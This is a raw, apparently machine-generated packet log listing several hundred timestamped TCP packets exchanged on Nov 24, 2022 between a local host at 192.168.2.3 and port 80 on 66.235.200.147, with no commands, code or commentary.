Nov 24, 2022 12:20:03.404603004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404614925 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404628038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404638052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404649019 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404670000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404690027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404690981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404711008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404731989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404736042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404752016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404771090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404783010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404792070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404813051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404817104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404833078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404854059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404870987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404872894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404891968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404900074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404913902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404933929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404953957 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404954910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404975891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404978037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404995918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405015945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405035973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405036926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405056000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405061007 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405073881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405093908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405113935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405116081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405133963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405139923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405153990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405174971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405180931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405194998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405214071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405216932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405236006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405251026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405258894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405265093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405278921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405293941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405308962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405329943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405349970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405363083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405370951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405394077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405414104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405433893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405455112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405474901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405481100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405481100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405493021 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405495882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405515909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405524969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405538082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405550957 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405559063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405576944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405596018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405610085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405631065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405635118 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405656099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405682087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405699015 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405708075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405734062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405760050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405786991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405787945 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405803919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405812979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405839920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405865908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405886889 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405891895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405913115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.405920029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405945063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405971050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405997038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.405998945 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406014919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406023026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406049013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406073093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406080961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406097889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406124115 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406141043 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406173944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406200886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406223059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406224012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406248093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406250000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406272888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406297922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406312943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406325102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406347990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406348944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406374931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406403065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406419992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406430006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406441927 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406455994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406481981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406507969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406526089 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406536102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406548977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406562090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406589031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406603098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406615973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406641960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406667948 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406682968 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406692982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406707048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406718969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406744003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406769037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406790018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406795025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406811953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406821012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406847000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406871080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406900883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406913042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406919003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406941891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406964064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.406987906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.406990051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407016039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407042980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407059908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407067060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407083035 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407092094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407116890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407150984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407171011 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407177925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407191992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407203913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407232046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407258034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407275915 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407283068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407296896 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407308102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407334089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407360077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407380104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407385111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407401085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407409906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407435894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407463074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407478094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407490015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407501936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407515049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407524109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407541990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407560110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407569885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407596111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407622099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407638073 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407649040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407672882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407675028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407695055 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407701015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407727003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407742023 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407753944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407779932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407804966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407819033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407830000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407845020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407856941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407885075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407912016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407927990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407938004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407953978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.407964945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.407991886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408018112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408039093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408044100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408058882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408068895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408094883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408119917 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408122063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408138037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408147097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408165932 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408173084 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408198118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408225060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408238888 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408250093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408267975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408277035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408303022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408318043 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408330917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408334017 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408355951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408382893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408399105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408407927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408423901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408433914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408459902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408471107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408484936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408489943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408510923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408528090 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408538103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408545017 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408565044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408584118 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408591032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408617020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408632040 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408643007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408668995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408694029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408711910 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408720016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408736944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408745050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408771038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408797026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408814907 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408823013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408842087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408848047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408873081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408900023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408916950 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408927917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408943892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.408952951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408974886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.408993006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409001112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409027100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409051895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409065962 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409077883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409090996 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409104109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409130096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409156084 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409173012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409181118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409195900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409205914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409231901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409256935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409274101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409282923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409300089 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409307957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409333944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409359932 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409382105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409384966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409399986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409410000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409436941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409461975 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409483910 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409488916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409503937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409513950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409539938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409565926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409583092 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409590960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409607887 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409615993 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409636974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409661055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409676075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409687996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409703016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409713984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409739017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409765959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409784079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409791946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409810066 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409816980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409843922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409857988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409869909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409894943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409921885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409928083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409948111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409967899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.409974098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.409997940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410012007 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410022974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410049915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410073996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410089016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410099983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.410116911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.410125971 CET	80	49710	66.235.200.147	192.168.2.3
